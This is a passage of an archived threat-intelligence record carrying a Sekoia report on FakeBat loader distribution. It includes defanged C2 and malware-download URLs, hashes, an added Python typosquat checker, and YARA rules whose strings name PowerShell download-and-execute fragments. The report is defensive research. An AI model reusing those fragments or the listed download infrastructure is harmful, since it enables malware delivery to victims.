are associated with the FakeBat distribution\r\ninfrastructure:\r\nnotilon[.]co\r\nnotliion[.]com\r\nnotlon[.]top\r\nnotlilon[.]co\r\nnotion.findreaders[.]com\r\nfindreaders[.]com\r\nnotion.ilusofficial[.]com\r\nBy applying this methodology to several frequently impersonated software products, we are able to monitor some well-known distribution clusters and constantly uncover new ones.\r\n
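The urlscan and Censys searches above return candidate hosts whose page title matches the official one while the domain does not. As an added example written for this edit (not code from the post or Sekoia's tracker), here is the same heuristic applied offline to such results, extended to say how each hit abuses the brand: brand used as a subdomain, brand on an unofficial TLD, brand embedded in a longer label, a close typosquat, or a copied page on an unrelated domain. The rows are constructed from domains listed above plus placeholders; the registrable-domain split is naive (last two labels), and the official title string is assumed to be the one the searches above use.

```python
# Added example for this edit, not Sekoia's tracker: apply the post's
# title-match / non-official-domain heuristic to search results offline.
# Assumption: the official title is the string the post's searches use.
OFFICIAL = {'notion': ('notion.so', 'Notion Desktop App for Mac & Windows')}


def levenshtein(a, b):
    '''Edit distance between two strings (insert, delete, substitute).'''
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host):
    '''Naive registrable domain: the last two labels. Good enough for the TLDs
    in this list; use a public-suffix library for co.uk-style suffixes.'''
    return '.'.join(host.strip('.').split('.')[-2:])


def assess(host, title, brand):
    '''Return None for the official site or for pages with another title;
    otherwise a record saying how the host abuses the brand.'''
    official_domain, official_title = OFFICIAL[brand]
    host = host.lower().replace('[.]', '.')  # accept defanged input
    if registrable(host) == official_domain:
        return None
    if title.strip() != official_title:
        return None
    label = registrable(host).split('.')[0]
    subdomains = host.split('.')[:-2]
    distance = levenshtein(label, brand)
    if brand in subdomains:
        kind = 'brand as subdomain'
    elif label == brand:
        kind = 'brand on unofficial TLD'
    elif brand in label:
        kind = 'brand embedded in label'
    elif distance <= 2:
        kind = 'typosquat'
    else:
        kind = 'copied page on unrelated domain'
    return {'host': host, 'kind': kind, 'distance': distance}


def assess_all(rows, brand):
    '''rows: iterable of (hostname, page title), as a urlscan export would give.'''
    results = []
    for host, title in rows:
        verdict = assess(host, title, brand)
        if verdict:
            results.append(verdict)
    return results


# Constructed rows: hosts from the list above plus placeholders (.example).
TITLE = OFFICIAL['notion'][1]
SAMPLE_ROWS = [
    ('notilon[.]co', TITLE),
    ('notliion[.]com', TITLE),
    ('notion[.]findreaders[.]com', TITLE),
    ('notion[.]li', TITLE),
    ('notion-loads[.]com', TITLE),
    ('rabby[.]pro', TITLE),
    ('notion.so', TITLE),
    ('blog.example', 'Something unrelated'),
]

if __name__ == '__main__':
    for r in assess_all(SAMPLE_ROWS, 'notion'):
        print(r['host'], r['kind'], r['distance'])
```

The kind label is useful when prioritising: a copied page on an unrelated domain (rabby[.]pro above) is often a shared kit or a compromised host rather than a domain bought for the campaign, while typosquats and brand subdomains point at infrastructure the operator registered on purpose.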
In addition to FakeBat, the distribution clusters\r\ncurrently monitored by Sekoia include:\r\nAn alleged FIN7 campaign, tracked as UNC4536 and UNC3319 by Mandiant, that distributed\r\nNetSupport RAT, possibly followed by DiceLoader or Carbanak. It was reported to use fake sites\r\nimpersonating multiple software products promoted with Google Ads4 5. The campaign targeted several popular\r\nsoftware products, including AnyDesk and Advanced IP Scanner, both widely used by IT administrators. Using our\r\ntracking heuristics, we detected this cluster, which leverages domain names such as\r\nadvancedipscannerapp[.]com (Advanced IP Scanner), bienvenido[.]com (AnyDesk) and\r\nwww.womansvitamin[.]com (AnyDesk).\r\nThe Nitrogen campaign that distributed Cobalt Strike, Sliver, or a Python-based backdoor, using fake\r\nsites promoted with Google Ads. These activities are associated with the BlackCat affiliate UNC4696 and\r\ncould have led to the deployment of their ransomware6. In particular, they impersonated the popular SSH\r\nclient PuTTY, with domain names such as pputy[.]com and puttyy[.]ca detected by our PuTTY heuristic.\r\nSeveral BatLoader distribution campaigns that impersonated IT software such as Slack and AnyDesk\r\nsince December 2022. In June 2024, our trackers identified domain names impersonating AnyDesk to\r\ndistribute BatLoader, such as anydesk[.]best and updaterdrivers[.]com.\r\nMultiple other clusters that distributed infostealer families, such as Lumma, Vidar and Redline.\r\nConclusion\r\nSold as Malware-as-a-Service (MaaS) to a limited number of customers, FakeBat became one of the most\r\nwidespread loaders that use the drive-by download technique in 2024.\r\n
In addition to the standard MaaS package,\r\nthe FakeBat operators offer a distribution service based on their loader, dedicated landing pages, and possibly\r\nsearch engine advertisements.\r\nIn 2024, TDR analysts identified several FakeBat distribution campaigns that leveraged malvertising, software\r\nimpersonation, fake web browser updates, and social engineering schemes on social networks. We assess with\r\nhigh confidence that the variety of FakeBat distribution clusters reflects both a diverse customer base using the\r\nmalware and the operators themselves distributing FakeBat through their Pay-Per-Install service.\r\nSince August 2023, we have unveiled more than 130 domain names associated with high confidence with the FakeBat C2\r\nservers. Monitoring payloads, C2 and distribution infrastructures enables us to identify changes, possibly\r\nmotivated by efforts to evade detection. Indeed, FakeBat operators almost certainly keep improving their anti-detection and anti-analysis techniques, and rotate their C2 infrastructure, to ensure a reliable MaaS service for their\r\ncustomers.\r\nTo protect our customers against drive-by download compromises, Sekoia.io analysts will continue to proactively\r\ntrack distribution infrastructures and identify new clusters of landing pages and fake browser updates.\r\nThank you for reading this blog post. Please don’t hesitate to provide your feedback on our publications.\r\n
You can also contact us at tdr[at]sekoia.io for further discussions.\r\nFakeBat IoCs \u0026 Technical details\r\nIoCs\r\nThe list of IoCs is available on the Sekoia.io GitHub repository.\r\nFakeBat C2 servers\r\nBetween August and December 2023:\r\n0212top[.]online\r\n0212top[.]site\r\n0212top[.]top\r\n0212top[.]xyz\r\n0909kses[.]top\r\n11234jkhfkujhs[.]online\r\n11234jkhfkujhs[.]site\r\n11234jkhfkujhs[.]top\r\n11234jkhfkujhs[.]xyz\r\n1212stars[.]online\r\n1212stars[.]site\r\n1212stars[.]top\r\n1212stars[.]xyz\r\n2311foreign[.]xyz\r\n2311forget[.]online\r\n2311forget[.]site\r\n2311forget[.]xyz\r\n2610asdkj[.]online\r\n2610asdkj[.]site\r\n2610asdkj[.]top\r\n2610asdkj[.]xyz\r\n2610kjhsda[.]online\r\n2610kjhsda[.]site\r\n2610kjhsda[.]top\r\n2610kjhsda[.]xyz\r\n3010cars[.]online\r\n3010cars[.]site\r\n3010cars[.]top\r\n3010cars[.]xyz\r\n3010offers[.]online\r\n3010offers[.]site\r\n3010offers[.]top\r\n3010offers[.]xyz\r\n343-ads-info[.]top\r\n364klhjsfsl[.]top\r\n465jsdlkd[.]top\r\n756-ads-info[.]site\r\n756-ads-info[.]top\r\n756-ads-info[.]xyz\r\n875jhrfks[.]top\r\n98762341tdgi[.]online\r\n98762341tdgi[.]site\r\n98762341tdgi[.]top\r\n98762341tdgi[.]xyz\r\n999-ads-info[.]top\r\nads-info[.]ru\r\nads-info[.]site\r\naipanelnew[.]ru\r\naipanelnew[.]site\r\ncdn-ads[.]ru\r\ncdn-ads[.]site\r\ncdn-dwnld[.]ru\r\ncdn-dwnld[.]site\r\ncdn-new-dwnl[.]ru\r\nclk-brom[.]ru\r\nclk-brom[.]site\r\nclk-brood[.]online\r\nclk-brood[.]top\r\nclk-info[.]ru\r\nclk-info[.]site\r\ncornbascet[.]ru\r\ncornbascet[.]site\r\ndns-inform[.]top\r\nfresh-prok[.]ru\r\nfresh-prok[.]site\r\nganalytics-api[.]com\r\ngotrustfear[.]ru\r\ngotrustfear[.]site\r\ninfocdn-111[.]online\r\ninfocdn-111[.]site\r\ninfocdn-111[.]xyz\r\nnew-prok[.]ru\r\nnew-prok[.]site\r\nnewtorpan[.]ru\r\nnewtorpan[.]site\r\nprkl-ads[.]ru\r\nprkl-ads[.]site\r\ntest-pn[.]ru\r\ntest-pn[.]site\r\ntopttr[.]com\r\ntrust-flare[.]ru\r\ntrust-flare[.]site\r\ntrustdwnl[.]ru\r\nBetween December 2023 and March 2024:\r\nads-analyze[.]online\r\nads-analyze[.]site\r\nads-analyze[.]top\r\nads-analyze[.]xyz\r\nads-change[.]online\r\nads-change[.]site\r\nads-change[.]top\r\nads-change[.]xyz\r\nads-creep[.]top\r\nads-creep[.]xyz\r\nads-eagle[.]top\r\nads-eagle[.]xyz\r\nads-forget[.]top\r\nads-hoop[.]top\r\nads-hoop[.]xyz\r\nads-moon[.]top\r\nads-moon[.]xyz\r\nads-pill[.]top\r\nads-pill[.]xyz\r\nads-star[.]online\r\nads-star[.]site\r\nads-star[.]top\r\nads-star[.]xyz\r\nads-strong[.]online\r\nads-strong[.]site\r\nads-strong[.]top\r\nads-strong[.]xyz\r\nads-tooth[.]top\r\nads-tooth[.]xyz\r\nads-work[.]site\r\nads-work[.]top\r\nads-work[.]xyz\r\nBetween March and June 2024:\r\ncdn-inform[.]com\r\nudr-offdips[.]com\r\nurd-apdaps[.]com\r\nusm-pontic[.]com\r\nutd-corts[.]com\r\nutd-forts[.]com\r\nutd-gochisu[.]com\r\nutd-horipsy[.]com\r\nutm-adrooz[.]com\r\nutm-adschuk[.]com\r\nutm-adsgoogle[.]com\r\nutm-adsname[.]com\r\nutm-advrez[.]com\r\nutm-drmka[.]com\r\nutm-fukap[.]com\r\nutm-msh[.]com\r\nutr-gavlup[.]com\r\nutr-jopass[.]com\r\nutr-krubz[.]com\r\nutr-provit[.]com\r\nFakeBat distribution infrastructures\r\nMalvertising and software impersonation:\r\namydlesk[.]com\r\nnotilon[.]co\r\nnotliion[.]com\r\nnotlon[.]top\r\nnotlilon[.]co\r\nnotion.findreaders[.]com\r\nfindreaders[.]com\r\nnotion.ilusofficial[.]com\r\nFake web browser updates:\r\nbrow-ser-update[.]top\r\nhxxps://brow-ser-update[.]top/download/dwnl.php\r\nhxxps://brow-ser-update[.]top/GoogleChrome-x86.msix\r\nphotoshop-adobe[.]shop\r\nhxxps://photoshop-adobe[.]shop/download/dwnl.php\r\nc336d98d8d4810666ee4693e8c3a2a34191bad864d6b46e468a7eed36e7085f4 (GoogleChrome-x86.msix)\r\nb5ed2f42359e809bf171183a444457c378355d07b414f5828e1e4f7b35bb505f (boci.ps1)\r\nSocial engineering schemes on social\r\n
networks:\r\napp.getmess[.]io\r\nhxxps://app.getmess[.]io/\r\nhxxps://app.getmess[.]io/download/dwnl.php\r\nhxxps://getmess[.]download/Getmess.msix\r\nutd-corts[.]com\r\nhxxp://utd-corts[.]com/buy/\r\n12ea41f2dfa89ad86f082fdf80ca57f14cd8a8f27280aca4f18111758de96d15 (Getmess.msix)\r\n72a1f6e7979daae38d8e0e14893db4c182b8362acc5d721141ed328ed02c7e28 (ynwje.ps1)\r\nFakeBat hashes\r\nMSIX files\r\nInitial PowerShell script\r\nFingerprint PowerShell script\r\nYARA rules\r\nYARA rules are available on the Sekoia.io GitHub repository.\r\nFakeBat, initial PowerShell script\r\nrule loader_fakebat_initial_powershell_may24 {\r\n    meta:\r\n        malware = \"FakeBat\"\r\n        description = \"Finds FakeBat initial PowerShell script downloading and executing the next-stage payloa\"\r\n        source = \"Sekoia.io\"\r\n        classification = \"TLP:WHITE\"\r\n    strings:\r\n        $str01 = \"='http\" wide\r\n        $str02 = \"=(iwr -Uri $\" wide\r\n        $str03 = \" -UserAgent $\" wide\r\n        $str04 = \" -UseBasicParsing).Content; iex $\" wide\r\n    condition:\r\n        3 of ($str*) and\r\n        filesize \u003c 1KB\r\n}\r\nFakeBat, fingerprint PowerShell script\r\nrule loader_fakebat_powershell_fingerprint_may24 {\r\n    meta:\r\n        malware = \"FakeBat\"\r\n        description = \"Finds FakeBat PowerShell script fingerprinting the infected host.\"\r\n        source = \"Sekoia.io\"\r\n        classification = \"TLP:WHITE\"\r\n    strings:\r\n        $str01 = \"Get-WmiObject Win32_ComputerSystem\" ascii\r\n        $str02 = \"-Class AntiVirusProduct\" ascii\r\n        $str03 = \"status = \\\"start\\\"\" ascii\r\n        $str04 = \" | ConvertTo-Json\" ascii\r\n        $str05 = \".FromXmlString(\" ascii\r\n        $str06 = \" = Invoke-RestMethod -Uri \" ascii\r\n        $str07 = \".Exception.Response.StatusCode -eq 'ServiceUnavailable'\" ascii\r\n        $str08 = \"Invoke-WebRequest -Uri $url -OutFile \" ascii\r\n        $str09 = \"--batch --yes --passphrase-fd\" ascii\r\n        $str10 = \"--decrypt --output\" ascii\r\n        $str11 = \"Invoke-Expression \\\"tar --extract --file=\" ascii\r\n    condition:\r\n        7 of ($str*) and\r\n        filesize \u003c 10KB\r\n}\r\nThank you for reading this blogpost. We welcome any reaction, feedback or criticism about this analysis. Please contact us on tdr[at]sekoia.io.\r\nFeel free to read other Threat Detection \u0026 Research analyses here:\r\nSource: https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/"
	],
	"report_names": [
		"exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure"
	],
	"threat_actors": [
		{
			"id": "c9617bb6-45c8-495e-9759-2177e61a8e91",
			"created_at": "2022-10-25T15:50:23.405039Z",
			"updated_at": "2026-04-10T02:00:05.387643Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Carbanak",
				"Anunak"
			],
			"source_name": "MITRE:Carbanak",
			"tools": [
				"Carbanak",
				"Mimikatz",
				"PsExec",
				"netsh"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-10T02:00:03.755516Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Silicon "
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf",
			"created_at": "2023-01-06T13:46:38.405479Z",
			"updated_at": "2026-04-10T02:00:02.961112Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"ATK32",
				"G0046",
				"G0008",
				"Sangria Tempest",
				"ELBRUS",
				"GOLD NIAGARA",
				"Coreid",
				"Carbanak",
				"Carbon Spider",
				"JokerStash",
				"CARBON SPIDER"
			],
			"source_name": "MISPGALAXY:FIN7",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ed3810b7-141a-4ed0-8a01-6a972b80458d",
			"created_at": "2022-10-25T16:07:23.443259Z",
			"updated_at": "2026-04-10T02:00:04.602946Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider",
				"ELBRUS",
				"G0008",
				"Gold Waterfall",
				"Sangria Tempest"
			],
			"source_name": "ETDA:Carbanak",
			"tools": [
				"AVE_MARIA",
				"Agentemis",
				"AmmyyRAT",
				"Antak",
				"Anunak",
				"Ave Maria",
				"AveMariaRAT",
				"BABYMETAL",
				"BIRDDOG",
				"Backdoor Batel",
				"Batel",
				"Bateleur",
				"BlackMatter",
				"Boostwrite",
				"Cain \u0026 Abel",
				"Carbanak",
				"Cl0p",
				"Cobalt Strike",
				"CobaltStrike",
				"DNSMessenger",
				"DNSRat",
				"DNSbot",
				"DRIFTPIN",
				"DarkSide",
				"FOXGRABBER",
				"FlawedAmmyy",
				"HALFBAKED",
				"JS Flash",
				"KLRD",
				"MBR Eraser",
				"Mimikatz",
				"Nadrac",
				"Odinaff",
				"POWERPIPE",
				"POWERSOURCE",
				"PsExec",
				"SQLRAT",
				"Sekur",
				"Sekur RAT",
				"SocksBot",
				"SoftPerfect Network Scanner",
				"Spy.Agent.ORM",
				"TEXTMATE",
				"TeamViewer",
				"TiniMet",
				"TinyMet",
				"Toshliph",
				"VB Flash",
				"WARPRISM",
				"avemaria",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "630987b6-1240-486a-ad47-bb63d6573e6b",
			"created_at": "2024-09-20T02:00:04.579123Z",
			"updated_at": "2026-04-10T02:00:03.697899Z",
			"deleted_at": null,
			"main_name": "UNC4536",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC4536",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bfded1cf-be73-44f9-a391-0751c9996f9a",
			"created_at": "2022-10-25T15:50:23.337107Z",
			"updated_at": "2026-04-10T02:00:05.252413Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"FIN7",
				"GOLD NIAGARA",
				"ITG14",
				"Carbon Spider",
				"ELBRUS",
				"Sangria Tempest"
			],
			"source_name": "MITRE:FIN7",
			"tools": [
				"Mimikatz",
				"AdFind",
				"JSS Loader",
				"HALFBAKED",
				"REvil",
				"PowerSploit",
				"CrackMapExec",
				"Carbanak",
				"Pillowmint",
				"Cobalt Strike",
				"POWERSOURCE",
				"RDFSNIFFER",
				"SQLRat",
				"Lizar",
				"TEXTMATE",
				"BOOSTWRITE"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82",
			"created_at": "2022-10-25T16:07:23.619566Z",
			"updated_at": "2026-04-10T02:00:04.690061Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"APT-C-11",
				"ATK 32",
				"G0046",
				"Gold Niagara",
				"GrayAlpha",
				"ITG14",
				"TAG-CR1"
			],
			"source_name": "ETDA:FIN7",
			"tools": [
				"7Logger",
				"Agentemis",
				"Anubis Backdoor",
				"Anunak",
				"Astra",
				"BIOLOAD",
				"BIRDWATCH",
				"Bateleur",
				"Boostwrite",
				"CROWVIEW",
				"Carbanak",
				"Cobalt Strike",
				"CobaltStrike",
				"DICELOADER",
				"DNSMessenger",
				"FOWLGAZE",
				"HALFBAKED",
				"JSSLoader",
				"KillACK",
				"LOADOUT",
				"Lizar",
				"Meterpreter",
				"Mimikatz",
				"NetSupport",
				"NetSupport Manager",
				"NetSupport Manager RAT",
				"NetSupport RAT",
				"NetSupportManager RAT",
				"POWERPLANT",
				"POWERSOURCE",
				"RDFSNIFFER",
				"Ragnar Loader",
				"SQLRAT",
				"Sardonic",
				"Sekur",
				"Sekur RAT",
				"TEXTMATE",
				"Tirion",
				"VB Flash",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434405,
	"ts_updated_at": 1775792152,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/adc3bbd04b39dfd993f8483a7b6dacf2c4304a65.pdf",
		"text": "https://archive.orkl.eu/adc3bbd04b39dfd993f8483a7b6dacf2c4304a65.txt",
		"img": "https://archive.orkl.eu/adc3bbd04b39dfd993f8483a7b6dacf2c4304a65.jpg"
	}
}